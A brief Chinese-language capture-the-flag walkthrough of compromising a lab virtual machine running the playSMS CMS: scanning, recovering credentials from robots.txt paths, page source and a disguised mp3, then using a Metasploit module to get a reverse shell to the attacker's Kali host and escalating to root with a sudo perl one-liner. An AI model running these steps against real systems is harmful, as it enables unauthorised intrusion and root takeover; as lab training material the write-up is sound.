ip扫描
端口扫描
访问80端口
点击提交,发现有zip文件
对文件进行下载
发现有robots敏感目录
拼接路径,逐个访问
查看网页源代码
发现密码,尝试解压
发现解压密码为freedom
解压完成后是mp3文件,但是无法打开
使用记事本打开
发现了一个url和一个用户名,拼接url进行访问
用户名使用刚刚获取的,密码使用查看网页源代码后得到的密码,逐个尝试
发现用户名为touhid 密码为diana
发现cms为playsms
利用msf工具,搜索该cms的漏洞
经过尝试,发现第二个可以使用
use 2
show options 查看需要设置的项
set targeturi /SecreTSMSgatwayLogin/ #配置页面的url
set password diana #配置密码
set username touhid #配置账户
set rhosts 192.168.237.137 #配置靶机ip
set lhosts 192.168.237.130 #配置kali的ip
run #开始
成功反弹shell
提取
输入shell
python -c 'import pty; pty.spawn("/bin/bash")' #python获取交互性shell
sudo -l #查看可提权文件
使用辅助网站进行查询
执行
sudo perl -e 'exec "/bin/sh";'
提权成功